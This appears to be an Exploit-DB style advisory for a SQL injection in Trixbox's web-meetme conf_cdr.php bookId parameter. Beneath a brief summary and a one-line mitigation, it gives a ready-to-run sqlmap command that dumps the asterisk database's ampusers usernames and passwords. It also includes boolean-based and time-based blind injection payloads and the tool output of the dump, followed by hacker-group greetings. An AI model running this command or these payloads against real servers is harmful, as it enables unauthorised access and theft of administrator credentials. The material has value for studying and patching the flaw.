SQL injection in Trixbox All Versions

vendor:

Trixbox

by:

Sc4nX

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Trixbox

Affected Version From: All Versions

Affected Version To: All Versions

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux / Win 7

2014

SQL injection in Trixbox All Versions

SQL injection vulnerability exists in Trixbox All Versions. An attacker can exploit this vulnerability to grab users/password hashes from ampusers table in asterisk database. This can be done by using a python sqlmap tool with the following command: python sqlmap.py -u http://localhost/web-meetme/conf_cdr.php?bookId=1 -D asterisk -T ampusers -C username,password --dump --level 4 --risk 4 --no-cast --threads 10

Mitigation:

Input validation should be done to prevent SQL injection attacks. Also, the application should be tested for SQL injection vulnerabilities.

Source

Exploit-DB raw data:

# Exploit Title: SQL injection in Trixbox All Versions
# Date: 13/03/2014
# Exploit Author: Sc4nX
# Email : Sec744[at]yahoo.com - r1z[at]hackermail.com
# Software Link: http://trixbox.org/downloads
# Tested on: Linux / Win 7

Example : (Grab users / password hashes from ampusers)�

root@sc4nx# python sqlmap.py -u http://localhost/web-meetme/conf_cdr.php?bookId=1 -D asterisk -T ampusers -C username,password --dump --level 4 --risk 4 --no-cast --threads 10

[*] starting at 07:53:52

[07:53:52] [INFO] resuming back-end DBMS 'mysql'
[07:53:52] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: bookId
� � Type: boolean-based blind
� � Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
� � Payload: bookId=1' RLIKE (SELECT (CASE WHEN (2971=2971) THEN 1 ELSE 0x28 END)) AND 'AIdK'='AIdK

� � Type: AND/OR time-based blind
� � Title: MySQL < 5.0.12 AND time-based blind (heavy query)
� � Payload: bookId=1' AND 3086=BENCHMARK(5000000,MD5(0x454a5a64)) AND 'qjLM'='qjLM
---
[07:53:52] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5.8
web application technology: Apache 2.2.3, PHP 5.2.5
back-end DBMS: MySQL 5
[07:53:52] [INFO] fetching columns 'password, username' for table 'ampusers' in database 'asterisk'
[07:53:52] [INFO] resumed: 2
[07:53:52] [INFO] retrieving the length of query output
[07:53:52] [INFO] resumed: 8
[07:53:52] [INFO] resumed: username
[07:53:52] [INFO] retrieving the length of query output
[07:53:52] [INFO] resumed: 8
[07:53:52] [INFO] resumed: password
[07:53:52] [INFO] fetching entries of column(s) 'password, username' for table 'ampusers' in database 'asterisk'
[07:53:52] [INFO] fetching number of column(s) 'password, username' entries for table 'ampusers' in database 'asterisk'
[07:53:52] [INFO] resumed: 1
[07:53:52] [INFO] retrieving the length of query output
[07:53:52] [INFO] resumed: 8
[07:53:52] [INFO] resumed: passw0rd
[07:53:52] [INFO] retrieving the length of query output
[07:53:52] [INFO] resumed: 5
[07:53:52] [INFO] resumed: admin
[07:53:52] [INFO] analyzing table dump for possible password hashes
Database: asterisk
Table: ampusers
[1 entry]
+----------+----------+
| username | password |
+----------+----------+
| admin � �| passw0rd |
+----------+----------+

===================================================================================
GZ : Dr.Hacker (Doksh) - CodeZero - All Memmbers Sec4ever.com�
The End :P